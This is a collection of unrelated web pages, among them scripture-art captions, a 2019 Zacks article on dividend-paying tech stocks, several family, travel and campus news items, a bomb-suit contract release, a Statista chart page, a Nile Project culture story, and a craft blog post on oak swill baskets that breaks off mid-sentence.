Beyond Bauhaus - Modernism in Britain 1933–66
Oct 01 - Feb 1, 2020
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Then God said, “Let us make man in our image, after our likeness. And let them have dominion over the fish of the sea and over the birds of the heavens and over the livestock and over all the earth and over every creeping thing that creeps on the earth.” So God created man in his own image, in the image of God he created him; male and female he created them. Scripture Art
To set us free. To transform us. To heal us. To give us a new life, in His loving embrace. Jesus Christ is literally God Himself, the creator of heaven and earth, the master of creation, the Lord of all the heavenly hosts…Jesus Christ is God. He came to us, and He did something incredible. Something literally NOBODY had expected. No prophet, no apostle, no angel and no demon had expected this. Scripture Art
and in the cutting of stones for settings and in the carving of wood, so as to perform in every inventive work. "He also has put in his heart to teach, both he and Oholiab, the son of Ahisamach, of the tribe of Dan. "He has filled them with skill to perform every work of an engraver and of a designer and of an embroiderer, in blue and in purple and in scarlet material, and in fine linen, and of a weaver, as performers of every work and makers of designs.
God is love and the Bible says His love is like a fire, stronger than death. Indeed God proved the intensity of His passionate love for us, when He became a human being, just like us, and died for us at the cross. He chose to give His own life for us, to set us free from sin, and bring us back to His heart. This incredible piece of Christian wall art shows us the deep love of God, who died for us, while we still sinners… Scripture Verse Art
Character Of WickedRevelation, Necessity Ofevangelism, nature ofSatan, Power OfSpiritual Warfare, Enemies InImagination, Evil SchemingPresent Evil AgeNames And Titles For SatanRevelation, Responses ToSatan As The Prince Of This WorldShiningUnbelief, Nature And Effects OfLikenessFalse ReligionUnbelief, Sourced InSatan, As DeceiverSpiritual Blindness, Consequences OfPrincehood Of SatanSatanticImage Of God Scripture Art
"Make for yourself an ark of gopher wood; you shall make the ark with rooms, and shall cover it inside and out with pitch. "This is how you shall make it: the length of the ark three hundred cubits, its breadth fifty cubits, and its height thirty cubits. "You shall make a window for the ark, and finish it to a cubit from the top; and set the door of the ark in the side of it; you shall make it with lower, second, and third decks. Scripture Art
Huram also made the pails, the shovels and the bowls. So Huram finished doing the work which he performed for King Solomon in the house of God: the two pillars, the bowls and the two capitals on top of the pillars, and the two networks to cover the two bowls of the capitals which were on top of the pillars, and the four hundred pomegranates for the two networks, two rows of pomegranates for each network to cover the two bowls of the capitals which were on the pillars.read more. Goodnews Art
And it will come about in that day, that every place where there used to be a thousand vines, valued at a thousand shekels of silver, will become briars and thorns. People will come there with bows and arrows because all the land will be briars and thorns. As for all the hills which used to be cultivated with the hoe, you will not go there for fear of briars and thorns; but they will become a place for pasturing oxen and for sheep to trample. Scripture Art
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3 Large-Cap Tech Stocks for Dividend Investors to Buy After Powell Update
Benjamin Rains
Zacks August 23, 2019
Federal Reserve Chairman Jerome Powell spoke Friday morning in a highly anticipated speech in Jackson Hole. Powell might not have said exactly what investors and Wall Street would have hoped, but he did say the U.S. central bank was prepared to provide more stimulus, via rate cuts, if the global economic pullback negatively impacts the U.S. economy.
The speech came just days after President Trump called for the Fed in a pair of tweets to cut its benchmark interest rate by at least a full percentage point. This came after the central bank last month cut rates for the first time since the financial crisis.
More rate cuts could come later this year, but Powell spoke about the limits of monetary policy to stimulate the economy amid larger uncertainty. “There are, however, no recent precedents to guide any policy response to the current situation," Powel said in prepared remarks Friday.
"Moreover, while monetary policy is a powerful tool that works to support consumer spending, business investment and public confidence, it cannot provide a settled rulebook for international trade.”
Amid the macroeconomic worries, investors have fled to safe haven assets such as the 10-year U.S. Treasury note, which has driven its yield down to 1.54% as of Friday morning, from 2.07% on July 26 and 2.33% three months ago. These low yields might make Wall Street look for higher returns elsewhere, no matter what happens on the trade war front, in a phenomenon known as the Tina effect or “there is no alternative” to stocks.
With this in mind, we searched using the Zacks Stock Screener for large-cap technology firms that also pay a dividend. Here are 3 of the strong tech stocks that came through our screen this morning…
1. Texas Instruments TXN
Texas Instruments manufactures analog and embedded semiconductors that help power everything from connected devices to automated factories. The broader chip industry has hit a bit of a downturn, which is hardly uncommon in this historically cyclical market that is reliant on broader business cycles. With that said, semiconductors will continue to drive forward technology for years to come, and TXN stock has easily outpaced the chip market over the last year years. Plus, Texas Instruments shares have popped 8% in the last 12 months against the industry’s 11% decline, and are up 30% in 2019 compared to the Semi-General’s 14% climb.
The Dallas-based company, with a $114 billion market cap, posted stronger-than-projected Q2 results in late July. TXN’s full-year 2019 earnings and revenue are projected to slip, but look poised to bounce back in 2020, based on our current estimates. TXN’s earnings estimate revision activity has also turned far more positive recently, which helps it earn a Zacks Rank #2 (Buy).
Plus, TXN sports an “A” grade for Growth in our Style Score system and currently pays an annualized dividend of $3.08 a share, with a 2.46% yield. Investors will also likely be pleased to hear that Texas Instruments has raised its quarterly dividend for 15 years in a row, with a compounded annual growth rate of 21% over the past last five years.
2. Verizon VZ
Verizon topped quarterly earnings estimates at the start of August and added 245,000 phone net additions, up from 199,000 added in the year-ago period, which topped analyst expectations. VZ has also pushed to roll out its 5G service to more cities throughout the country as it battles rival AT&T T, as well a possible larger third player—the joint Sprint S and T- Mobile US TMUS—in the next-generation of wireless communication. Shares of VZ are up over 16% in the last two years to easily top the wireless industry’s 1.5% average climb.
Looking ahead, our current Zacks Consensus Estimates call for Verizon’s full-year revenue to climb 0.40% to $131.37 billion, with earnings projected to jump nearly 2%. Peaking ahead to fiscal 2020, VZ is expected to see its revenue climb 1.1% above our current-year estimate, with EPS expected to come in 1.7% higher.
Verizon’s longer-term earnings estimate revision activity has trended heavily in the right direction, which helps VZ earn a Zacks Rank #2 (Buy) at the moment. VZ also rocks “A” grades for Value and Momentum, as well as a “B” grade for Growth. Plus, the wireless giant’s $2.41 a share annualized payout helps its dividend yield rests at an impressive 4.24%.
3. Microsoft MSFT
Shares of Microsoft have outpaced its industry’s average in 2019, up 33%. This climbed has helped MSFT become the world’s most valuable public company, with a market cap over $1 trillion. The historic tech powerhouse’s run is even more impressive over the last five years, as its expansion into cloud computing attracts more investors. Last quarter, the firm’s Intelligent Cloud division jumped 19%, with Azure up 64%. Meanwhile, Microsoft’s Office, Windows, gaming, and other segments have expanded at impressive clips.
On top of that, the Redmond, Washington-based firm currently pays an annualized dividend of $1.84, which is up nearly 10% from the prior year’s quarterly payout. Despite MSFT’s climb (up 134% over the past three years against the S&P 500’s 34%), the company’s yield comes in at 1.34%. Like its peers, Microsoft is a Zacks Rank #2 (Buy) right now that also holds an “A” grade for Growth.
Furthermore, MSFT’s current fiscal 2020 and 2021 revenues are projected to jump 11% and 10.5%, respectively. And the company’s EPS figure is projected to climb roughly 10% this year and 12.8% higher in the following year.
Wall Street’s Next Amazon
Zacks EVP Kevin Matras believes this familiar stock has only just begun its climb to become one of the greatest investments of all time. It’s a once-in-a-generation opportunity to invest in pure genius.
Click for details >>
AT&T Inc. (T) : Free Stock Analysis Report
Sprint Corporation (S) : Free Stock Analysis Report
Verizon Communications Inc. (VZ) : Free Stock Analysis Report
Microsoft Corporation (MSFT) : Free Stock Analysis Report
T-Mobile US, Inc. (TMUS) : Free Stock Analysis Report
Texas Instruments Incorporated (TXN) : Free Stock Analysis Report
Zacks Investment Research
1 Great Stock to Buy Today and Then Never, Ever Sell
$50 Million Lotto Max Jackpot Ticket Sold in Vaughan
CNW Group
For First Time in 26 Years, All U.S. Metros Enjoyed Income Gains
Exclusive: EU industry chief to dismiss fears strict security rules could delay 5G
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ASU Collaboratory to Focus on Connected Environments
Cal State San Bernardino Powers Up With Wireless Charging
By Rhea Kelly
Powermat's wireless charging rings
Students at California State University, San Bernardino will soon be able to charge their mobile devices wirelessly all over campus. The school is installing the Powermat wireless charging platform in high-traffic common spaces, student union areas, study areas, and on-campus cafes and restaurants to help students stay connected to the information and learning resources they need. The next step will be a broader implementation in the university's library and classrooms.
"E-learning has become part of every student's lifestyle with course materials, assignments and videos hosted online and accessible via mobile," said Gerard Au, associate vice president, Information Technology Services at CSUSB, in a press release. "As mobile device usage increases, we need to extend our capability to keep up, and the Powermat platform is an important part of that infrastructure as it will allow our students to stay connected and learning all day long,"
The number of mobile devices connected to CSUSB's wireless network has increased 16 percent year over year, according to Au. While the university recently upgraded its network, there were not enough electrical outlets to keep students' devices charged up.
"The Powermat platform allows us to monitor the charging spots and take full advantage of usage trends. We can then engage students with university-sponsored information via the Powermat application when they charge. Having the ability to manage the technology and engage students beyond a simple charging solution is what made us decide to partner with Powermat," said Au.
About the author: Rhea Kelly is executive editor for Campus Technology. She can be reached at [email protected].
Preparing for Guided Pathways – A readiness assessment for colleges and universities
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Canadian Family Canadian Family
Baby Gear Guide
New Baby Guide
Family Tested
STEM Guide
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Food Daily
Events, Deals and Offers
Dispatch from the Upper Peninsula: Welcome to the UP
Anyone who has been to Northern Ontario will tell you that, from Kenora to Thunder Bay to Sault Ste. Marie, the area has its charms, many of them natural. Shining waters and green forests attract anglers, kayakers, canoeists and hikers in the summer and snowmobile, snowshoe and other snow-related enthusiasts in the winter. It’s the perfect destination for those fed up with the headaches of urban life.
And right next door sits an area often overlooked by many Canadians: Michigan’s Upper Peninsula, a place where Lakes Superior, Michigan and Huron meet. (Click here to listen to an excellent Tim Allen-narrated radio commercial about the Upper Peninsula’s Great Waters.) If you’re heading to Northern Ontario (or even if you’re not), “the UP” is definitely worth a visit. The area contains many natural wonders and a very well-developed tourist infrastructure that makes these earthy attractions accessible for visitors—especially families. Think: peaceful, pristine forests opened up by solid, smooth wooden boardwalks, big waterfalls (including, surprisingly, the second largest east of the Mississippi—bested only by Niagara) with staircases to the bottom, and kid-friendly outfitters equipped to take the whole family on a Great Lakes adventure.
Culturally, the UP is also an interesting place. Cut off from the rest of Michigan until the massive Mackinac Bridge—which spans the narrows between Huron and Michigan—was built in 1959, “Yoopers” developed a distinctive accent, attitude, love for nature and fierce independent spirit. When you visit, be sure to ask the locals the difference between a troll and a fudgie. And aesthetically as well, this place feels somewhat frozen in time (in a good way), a throwback to the days when signs announced things in old-school neon and the server at the restaurant actually owned the place. Indeed, the pace is rather agreeable in the towns and forests and waters that dot the UP, and I will point out some of the highlights in the next few dispatches.
—Tim Johnson, CF’s contributing editor
One of five chutes at Lower Tahquamenon Falls.
Welcome to the UP.
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Kids Can Get Muddy And Stay Active By Conquering Mini Mudder Courses
Kids can quench their thirst for adventure by conquering a one mile obstacle course mud run.
Everyone has heard about Tough Mudder, the muddy obstacle course for adults that tests your mental fortitude, stamina, and physical prowess. But did you know there’s one for kids?
That’s right, adventure-seeking kids can test their strength, grit, and mental toughness on a mind-bending, muddy obstacle course designed just for them called Mini Mudder. The mud run is a 1-mile obstacle course for children ages 7-12 who are over 3.5 feet tall, and is comprised of about 10 fun and challenging obstacles. On the way to the finish line, kids will have to tackle obstacles named Monkey Swing, Tunnel of Terror, Secret Agent Squeeze, and Everest, where they will have to swing from bars, crawl through muddy tunnels, get past a laser maze, and climb to the top of a quarter pipe. When they cross the finish line, they will have crushed their fears, achieved their goals through teamwork, and learned that they can do anything.
We caught up with Eric (ERock) Botsford, Tough Mudder’s certified trainer and warm-up emcee to learn more about Mini Mudder and how kids can prepare for this fun run.
Why are obstacle courses good for kids to participate in?
Obstacle courses, such as Mini Mudder, are awesome activities for kids because it’s a great activity that teaches kids about playing outdoors, working as a team, and experiencing the thrill of adventure. Mini Mudder allows kids to get muddy and to take on a challenge that builds self-confidence, boosts peer interactions, and lets them have fun.
Also, noncompetitive events such as obstacle courses are fun and challenging while teaching kids about exercise, being active, and health from an early age. By getting kids involved in an event such as Mini Mudder, you can encourage them to play outside and prepare for their upcoming obstacle course—just like an adult would. And it’s fun!
What are five training exercises children can do to prepare for the Mini Mudder.
Light Jogging–A light jog in the backyard, a park, or around the playground is a fun way to warm-up. Kids can play tag with friends to get their hearts pumping and to get moving.
Bike Riding–Bike riding has many health benefits for both kids and adults, and it’s a great activity that can be done as a family. Bike riding can also activate a full range of muscles, which is beneficial for when the kids are out on the Mini Mudder course.
Swimming–Now that summer is finally here, swimming is a great activity for kids of all ages. It boosts cardiovascular health while engaging core muscles that can be used out on the Mini Mudder course. Whether at the beach, in the backyard, or at your local recreation center’s pool, swimming is a fun way to exercise and stay cool, and there are so many games and activities you can play at the pool.
Hiking–Family hiking is a great way to encourage kids to play outside and enjoy nature. If you don’t live near trails or mountains, take family walks after dinner or on the weekends.
Sports–Activities such as soccer, basketball, and gymnastics are great practice for Mini Mudder. Extracurricular activities like sports let kids be active and teach them about exercise, but more importantly, they allow kids to be part of a team, interact with peers, boost confidence, and enhance motor skills, which are very important skills for Mini Mudder.
How long should kids train in advance of the event?
We recommend that kids train for at least a month in advance. It’s important for kids to be use to running, climbing, playing outside, and other various activities and ranges of motion that they’ll do at the Mini Mudder. In addition, training for a few weeks ahead of time will build stamina and get children comfortable with the moves/exercises. For parents training for the Tough Mudder, it’s great to train and play with your kids so they’re excited to complete the Mini Mudder.
What can children expect on the day of the mud run?
Children can expect a fun and adventurous day of getting muddy, taking on fun and challenging obstacles, and feeling a sense of accomplishment while they’re being cheered on by friends and family. Kids will learn how beneficial teamwork is to achieving a goal, be encouraged to try new things, build friendships, and work as a team.
Is there anything else you want our readers to know about Mini Mudder?
Mini Mudder teaches kids about the power of play and the thrill of adventure. Kids today are busier than ever between school and other activities. Mini Mudder is a great activity for kids to train for and look forward to. It’s also a wonderful family experience that builds confidence and leaves kids with a sense of pride and accomplishment.
Mini Mudders should expect to get a little muddy so parents should bring a change of clothes and a towel so kids can clean up afterwards. Food and drinks will be available onsite, but bring snacks and water to stay fueled and hydrated. Don’t forget to wear sunscreen and take lots of pictures!
The next Mini Mudder in the NYC area will be held on July 22 and 23 in Long Island. For more information about Mini Mudder, visit Tough Mudder.
Photo Courtesy of Tough Mudder
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CBRNe World Jakarta
CBRNe Convergence Boston
United States Air Force Selects Med-Eng EOD 10 Bomb Suit to Protect its EOD Teams
Written by CBRNe World Staff. Published on 12 April 2018 .
Med-Eng®, a brand of The Safariland Group, today announced it has been awarded a five-year Indefinite Delivery Indefinite Quantity (IDIQ) contract to provide the United States Air Force (USAF) with the Med-Eng EOD® 10 bomb suit to protect personnel conducting Explosive Ordnance Disposal (EOD) operations. The USAF selected the EOD 10 suit and accessories through a competitive solicitation process that required meeting the new National Institute of Justice Standard 0117.01 (NIJ Standard) for protection against blast, fragmentation, impact and heat, among many other demanding factors. Under the contract, which has a maximum value of $15 million, the USAF may procure up to 305 EOD 10 bomb suits during the five-year term.
“Med-Eng is honored to provide equipment that will help protect the lives of the United States Air Force’s EOD teams as they carry out critical, dangerous and life-saving missions,” said Rob Reynolds, vice president, general manager, Med-Eng. “Selecting Med-Eng and our EOD 10 suit demonstrates the USAF’s confidence in our ability to meet the evolving threats and operational requirements facing our military EOD operators and public safety bomb technicians in even the harshest conditions.”
The EOD 10 bomb suit is certified to the NIJ Standard and meets or exceeds the USAF’s rigorous criteria. This NIJ Standard focuses on six crucial areas – fragmentation, impact, flame, some blast overpressure, optics, and ergonomics – that reconcile protection requirements with bomb technicians’ need for mobility, clear vision, and dexterity. Med-Eng is currently the only bomb suit manufacturer to meet the new NIJ Standard certification.
This sophisticated bomb suit ensemble provides an optimal balance between multi-threat blast protection and ergonomic flexibility. Its user-focused design features voice activation, integrated cooling and compatibility with Chemical & Biological protective equipment. It has also been extensively tested against threats representative of Improvised Explosive Devices (IEDs).
Fulfilment of the contract will support highly skilled manufacturing operations in Ogdensburg, New York, where Med-Eng produces bomb suits for all four branches of the U.S. Military, as well as for state and local law enforcement bomb squads. This facility currently manufactures the U.S. Army’s in-service Advanced Bomb Suit (ABS) and all other Med-Eng bomb suit models, which are widely used across the United States.
The EOD 10 bomb suit has been procured by military and public safety agencies in 28 countries and is currently in service worldwide. For more information about Med-Eng, please visit www.med-eng.com
Tags: Threat, Equipment, Chemical, Military, Army, Protection, Biological, Contract, Explosive
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Society›
Italy: transfers of residence between municipalities 2007-2017, by type of movement
Published by Statista Research Department, Oct 15, 2019
The statistic shows the number of transfers of residence between Italian municipalities from 2007 to 2017, by type of movement. According to the numbers, in 2012 the number of transfers within the same province peaked at 938 thousand individuals.
Transfers of residence between Italian municipalities from 2007 to 2017, by type of movement
Within the same province
Between different provinces
Between different regions
Number of immigrants entering the United Kingdom 1980-2019
Net migration figures in the United Kingdom 1980-2019
Number of emigrants leaving the the United Kingdom 1980-2019
Number of asylum applications in the United Kingdom (UK) 2001-2019
Statistics on "Migration in the UK"
Net migration to the United Kingdom by citizenship 2008-2019
Number of migrants to the United States from Great Britain 1820-1957
Non-British population in United Kingdom 2018/19, by nationality
Number of EU nationals in the United Kingdom 2018
Number of UK citizens living in EU countries 2018
French population of the United Kingdom (UK) 2008-2019
German population of the United Kingdom (UK) 2008-2019
Spanish population of the United Kingdom (UK) 2008-2019
Italian population of the United Kingdom (UK) 2008-2019
Irish population of the United Kingdom (UK) 2008-2019
Visas issued in the United Kingdom 2005-2018
Number of visas issued in the United Kingdom in 2018, by type
Number of work visas issued in the United Kingdom 2005-2018
Number of study visas issued in the United Kingdom 2005-2018 by type
Number of working visas granted in the United Kingdom in 2018 by nationality
Number of study visas granted in the United Kingdom in 2018 by nationality
Number of asylum grants and refusals in the United Kingdom 2001-2019
Number of asylum applications in the UK in 2018/19 by nationality
Italy: citizens registered and deregistered 2017, by country of origin/destination
Italy: internal net migration rate 2015, by region
U.S. Immigration - Origin countries of green card recipients 2018
Italy: population density in 2010-2015
Satisfaction with the work done by mayors and the municipal team in France 2018
Average monthly salary of dentists in municipalities in Sweden 2018, by gender
Refugee distribution in selected municipalities in Norway 2017
Italy: number of mayors 2018, by region
Leading 10 municipalities for commuters leaving the municipality in Italy 2011
Municipalities with the largest share of child poverty in Norway 2017
Number of dentists in primary municipalities in Sweden 2018, by gender
Italy: number of mayors 2018, by macro-region and gender
Share of commuters in Italy 2017, by region and status of commuter
U.S. municipalities with SSO food waste collection 2005-2014
Italy: number of municipalities 2018, by macro-region
Municipalities in Luxembourg as of 2018, by size
Intentions to move in the U.S. 2018
U.S. emergency department visits for injuries involving a firearm by patient residence 2009
Expenditure on Facebook services in municipalities in Sweden 2015
U.S. emergency department visits for injuries involving a firearm by patient residence 200...
Immigration/migration in the United States Demography Population
Istat. (November 29, 2018). Transfers of residence between Italian municipalities from 2007 to 2017, by type of movement [Graph]. In Statista. Retrieved January 19, 2020, from https://cdn1.statista.com/statistics/649780/italy-transfers-of-residence-between-municipalities-by-type-of-movement/
Istat. "Transfers of residence between Italian municipalities from 2007 to 2017, by type of movement." Chart. November 29, 2018. Statista. Accessed January 19, 2020. https://cdn1.statista.com/statistics/649780/italy-transfers-of-residence-between-municipalities-by-type-of-movement/
Istat. (2018). Transfers of residence between Italian municipalities from 2007 to 2017, by type of movement. Statista. Statista Inc.. Accessed: January 19, 2020. https://cdn1.statista.com/statistics/649780/italy-transfers-of-residence-between-municipalities-by-type-of-movement/
Istat. "Transfers of Residence between Italian Municipalities from 2007 to 2017, by Type of Movement." Statista, Statista Inc., 29 Nov 2018, https://cdn1.statista.com/statistics/649780/italy-transfers-of-residence-between-municipalities-by-type-of-movement/
Istat, Transfers of residence between Italian municipalities from 2007 to 2017, by type of movement Statista, https://cdn1.statista.com/statistics/649780/italy-transfers-of-residence-between-municipalities-by-type-of-movement/ (last visited January 19, 2020)
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Nile Project: Using culture to transform conflict - Daily News Egypt
Culture Nile Project: Using culture to transform conflict
Nile Project: Using culture to transform conflict
Through music production, educational workshops and activities promoting innovation, the project aims to contribute to finding solutions to the conflict over water resources
Marwa Morgan November 26, 2014 Be the first to comment
Sudanese singer Al-Sara at the musicians gathering at Minya
(Photo Handout from The Nile Project Facebook page)
Bongo beats follow the mellow marimba tunes as the singer starts chanting, eloquently juggling between the languages spoken in the Nile basin countries. The chorus follows in Arabic: “We’re all one, in every part of the world, we’re all one.”
Kulina Wahed (We’re all one) is one of the songs produced by The Nile Project in its first album. The song bears the ethos of the project: transforming the Nile conflict into a dialogue, through music, education and innovation.
Founded in 2011 by the project’s president and CEO, Egyptian ethnomusicologist Mina Girgis, and Ethiopian-American singer Meklit Hadero, the project brings together musicians from different Nile basin countries.
“[The project] uses music to expose the audience to their neighbours’ culture to resolve the conflict,” said Girgis.
Eighteen singers from Egypt, Sudan, Kenya, Uganda, Ethiopia and other Nile basin countries joined the project during its launch early in 2013 to produce its first album Aswan, which borrows its name from the city where it was produced.
After successful performances in Egypt, the project organised a tour around Africa in 2014. Fourteen musicians, including Egyptian singer Dina El-Wedeidy, Sudanese Al-Sara and Ethiopian Selamnesh Zemene, performed in 13 concerts, starting from Uganda, the river source, and ending in Egypt, the mouth. Concerts featured music that was collaboratively composed at a gathering in Uganda, according to the project’s website.
Nile Project musicians perform at Zanzibar during their last Africa tour
However, The Nile Project’s activities are not restricted to music. 20 university students from Egypt, Ethiopia, Uganda, Kenya and Tanzania will be offered an 18-month fellowship to “immerse them in an intensive exploration of the Nile basin and awaken their sense of stewardship for the river.”
In addition to the fellowships, the project will award “incentives” to university students who develop possible solutions to Nile food sustainability challenges.
The project tours also include workshops that introduce university students to their “neighbours’ culture”, and discuss possible collaboration with fellow students from other countries, Girgis said.
The musicians gathered in Minya for two weeks, and will also give two concerts in Cairo and Alexandria this November, as a part of the preparations for their next tour. The tour, which is scheduled to take place between January and May 2015, will bring the culture of the Nile to the United States.
“Anyone can be a Nile citizen,” said Girgis, explaining that collaboration to solve the conflict doesn’t have to be restricted to residents of Nile basin countries.
Nile basin countries have been locked in a diplomatic dispute, which reached its peak in 2013, regarding the construction of the Grand Ethiopian Renaissance Dam, which Egypt fears will have a detrimental effect on its share of Nile water. Egypt utilises more Nile water than any other country, using 55bn cubic metres annually, as stipulated in agreements that were signed in the absence of Ethiopia.
Nile Project musicians perform at Al-Bernameg show in Egypt
“Identity is the root of the conflict,” said Girgis. “It’s a powerful question about who deserves the resources.”
“The dichotomy” between Egypt being a Mediterranean or an African country, makes the situation “challenging” not just for Egyptians, but for some Africans who view Egypt as “different” from other African countries, he said.
Questions about such challenges have been raised in the project’s discussions, and in previous workshops. Workshops have focused on the Nile and African identity, the relationship between ancient Egyptian civilisation and the roots of European civilisations, and how some Egyptians are trying to promote “a new sense of identity” that is connected to Africa, Girgis said.
“We faced some bureaucracy and worries about the content of the workshops,” he said, “but also a lot of enthusiasm about what’s happening. The enthusiasm was much more.”
The Nile Project will have concerts on 27 November at Sawy Culturewheel, and 28 November at the Bibliotheca Alexandrina.
Topics: africa art award concert Conflict Culture Daily News Egypt dialogue DNE Egypt ethiopia food identity music nile nile basin Nile project resources river students sustainability tour university workshop
Marwa Morgan
Marwa is a journalist and street photographer interested in cultural identities and contemporary art.
Her website is www.marwamorgan.com. Follow her on twitter @marwamorgan.
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https://cdn2.dailynewsegypt.com/2014/11/26/nile-project-using-culture-transform-conflict/
Revealer of the Secret: the similarities between ancient and modern Egyptian civilisations
November 26, 2014 Breaking News
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Duterte meets with MNLF founder Misuari
Inquirer.net July 10,2019 - 01:37 PM
MANILA, Philippines – For the third time this year, President Rodrigo Duterte on Tuesday met with Moro National Liberation Front (MNLF) founding chairman Nur Misuari in Malacañang.
Joining Duterte in the meeting were former presidential aide and now Sen. Christopher “Bong” Go, Executive Secretary Salvador Medialdea, Presidential Adviser on the Peace Process Carlito Galvez, Jr. and Agriculture Secretary Emmanuel Piñol.
Piñol is being eyed by Duterte to be his “point man” in the Bangsamoro Autonomous Region in Muslim Mindanao (BARMM), which was a product of the peace agreement between the government and Moro Islamic Liberation Front (MILF).
Details of the meeting have yet to be released as of posting time.
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Duterte and the MNLF leader previously met on February 25 and March 19.
Duterte recently said he was in a “hurry” to strike an agreement with Misuari who had warned him of war if federalism is not adopted. (Editor: Gilbert S. Gaviola)
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Tag Archives: Sebastian Cox
New Craftsmen celebrating the art of swilling
Posted on November 6, 2014 by carefullycurateduk
While working in Manchester, Lorna Singleton yearned to return home to South Cumbria to do something practical, creative and to spend more time outdoors. WWoof-ing’ confirmed her desire to reconnect with the landscape of her childhood. ‘WWOOF’ stands for World Wide Opportunities on Organic Farms, and while on the farm, Lorna was introduced to greenwood crafts. Today she is one of only a handful of remaining swillers in the country.
Lorna began an apprenticeship with the Bill Hogarth (MBE) Memorial Apprenticeship Trust for three years of intensive tuition in coppicing and greenwood crafts. Bill Hogarth started working with wood in mid-1940s, aged 14, dressing and tying hazel for ships fenders. As traditional markets for coppiced hazel dried up, Hogarth was the last coppice merchant in the Lake District by the 1980s. He dedicated himself to sharing his skills, stories and knowledge of woodland management. In 2000, a trust was set up to continue sharing knowledge of traditional coppice woodland management.
Coppicing, a traditional form of woodland management, is the practice of cutting young tree stems close to ground level. New shoots emerge, and, after a few years the coppiced tree, or stool, is ready to be harvested, and the cycle begins again. Opening the canopy and increasing light to the woodland floor allows plants to thrive, and as sections of woodland, or coups, are coppiced in rotation the practice creates a variety of habitats.
Lorna’s passion for weaving oak swills, traditional baskets unique to the Lakeland grew. Willow, a more familiar basket material does not thrive in the bracing climate and rugged terrain of Cumbria, so the population had to work with the materials they had to hand, oak. The oak is hand-coppiced when it is about twenty-five years, much later than other woods are coppiced, but early in the life of oak.
Lorna cleaves, or splits, the green wood, along its grain into strips. The strips, or spells, are boiled overnight and soaked in water until they becomes supple (see right). Splitting the wood along its grain, keep s the fibres together retaining the strength of the tree. Pieces of hazel are steamed over the boiling oak, and bent into the frame of the basket. Once softened, the cleft wood is riven into even thinner strips, around 2-3mm, before it is hand-woven into baskets. A single swill basket takes about a day to weave. The strong, hard-wearing swill baskets were often used to collect potatoes and other crops, but their uses are not limited to the garden, making fine washing baskets, storage for root vegetables and carrots in a larder, logs, newspapers, or toys.
Through working with the coppiced wood, Lorna has become intimately familiar the material’s properties and limitations. She describes how, in time, the craft becomes a familiar, almost meditative, ritual, with the tools feeling an extension of the hand, and the craftsman’s body moving unconsciously to make and mold the material.
I caught up with Lorna during the London Design Festival where she was maker-in-residence at the New Craftsmen gallery, surrounded by new pieces from a collaboration with Sebastian Cox. The two met at a National Coppicing Federation workshop. Sebastian’s experience of re-interpreting traditional crafts and products, and with a contemporary twist provided invaluable insights for Lorna as she grows her retail offering. In turn, Lorna introduced Sebastian to the practice of swilling, and a collaboration was born.
The resulting ‘Swill’ ceiling lights, made of oak swill skilfully woven into cylinders cast a cross-hatch light when illuminated. The lights can be clustered into groups of three, five or seven, priced from £195 for the trio (9cm x 9cm (d) x 12cm (h)).
The ‘Swill’ bench and stools pair silver grey swilled oak spells with a glue-less ash frame on fine, tapered legs for an elegant, strong seat. The bench, £595, and the stool, £355 are both available from the New Craftsmen (pictured above in situ). The seat of each bench or stool has a unique pattern reflecting the texture, colour and width of the individual spells.
The ‘Swill Hanging Shelves’ also combine ash and oak swill in a harmonious pair (priced from £75 for a small shelf, 10cm x 30cm (d) x 2cm (h)). Lengths of swill are spilt, wrapped through an ash shelf and pinned with copper rivets. The shelves are exceptionally lightweight and strong and can be hung in tessellation or alone. The shelves do equire a slight DIY intervention, as you have to soak the swill coil in water for 15 minutes, then hang the shelf on the rail with some books to weigh it down, to ensure the swill dries straight. What better introduction to this timeless craft.
Image credits: New Craftsmen Gallery where not my own.
Posted in British made, Native species, Natural materials, Wood Tagged Furniture, London Design Festival, Natural material, Sebastian Cox
Tent London 2014 favourites
A pitstop at Nude Espresso on Hanbury Street set me buzzing for my favourite London Design Festival destination, Tent London. The more established SuperBrands and international zones on the ground floor soon merge into the fresh, fun and less formal stands typically from younger or emerging designers. My first rendez vous was not with an exhibitor, but with potter and designer Isatu Hyde. I bought some of her medium-sized stoneware bowls, inspired by those from a monastery in Harrogate, at the New Designers show earlier in the year. The bowls are in demand, so much so that Isatu asked to borrow mine for Design-Nation Presents at the Southbank Centre Terrace Shop. Tickets are still available for the Meet the Maker evening on Tuesday 7th October, but you can see the work on show until 31st October. Unburdened, I was free to roam. The understated elegance of Mater immediately caught my eye. Founded in 2006, Mater (Latin for mother) is a high-end Danish furniture and lighting brand with a philosophy based on design, craftsmanship and ethics . Contemporary design is combined with support for local craftsmen, their traditions and careful material selection. A member of the UN Global Compact, and supporter of local sustainable business projects, Mater strive to minimize negative impacts, creating durable and desirable products that they home their customers will cherish. Pictured are the Luiz pendant lamp, made from natural FSC (Forest Stewardship Council) cork, suspended above the Bowl Table. The table top is made mango wood, felled once the tree has reached the end of its productive life, and another planted. The top is hand-turned on a lathe by craftsmen from the Kharadi community. The top is finished with a lead-free, water-based polyurethane lacquer. The hollow steel legs can be removed for more efficient packing and transport. Mater products are stocked by Skandium in the UK. Exploring the story of the object, Second Sitters upholstery installation workshop was a chance to appreciate the skills, techniques and materials of upholstery up close, and hands-on as you could delve into boxes of horsehair, hessian and more. Furniture Magpies revive furniture in a different way. Literally deconstructing unloved pieces and reconfiguring them to more contemporary tastes while retaining their character and story. The coffee table made of cross-sections of banister spindles was particularly striking. Upstairs were two of my favourite makers, both launching new collections. Galvin Brothers were presenting their new Cross Lap collection. A clean and contemporary collection of tables, benches, consoles and stools in native steamed beech and American black walnut, and finished in water-based lacquers. Described as “modern rustic”, and in colours close to Carefully Curated’s own palette, how could I not be a fan? Here is Matthew Galvin, just completing a piece to camera for Casafina’s round up of Tent London, which also features, Sebastian Cox. London Design Festival was a busy week for Sebastian Cox with the Wish List (and workshop) at the V&A, scorching and swilling pieces for the New Craftsmen, on Radio 4 with Sir Terence Conran, and the nominations for the Wood Awards, and Elle Decoration’s Best British Sustainable Design. In the midst of this exciting flurry, Cox’s stand had an air of calm, matching the quiet serenity of the newly launched Underwood Collection, all made from hand-coppiced Kentish hazel and well-managed British ash. The collection is called ‘Underwood’ as the pieces use coppiced hazel ‘in the round’, that is usually considered waste. In the foreground are pictured the ‘Hewn’ tea table (£195), bench (£300), and trestle (£170 each). The Mop stick ladder (£210), shelves (£790) and Peg hooks (£55) are in the background. A true celebration of British hardwoods. Nearby, Daniel Heath launched his Art Deco collection. The geometric motifs are etched onto reclaimed Welsh roof slates transforming the discarded into decorative interior surface materials. The geometric shapes of Tracey Tubb’s wallpapers are inspired by origami. Each sheet is 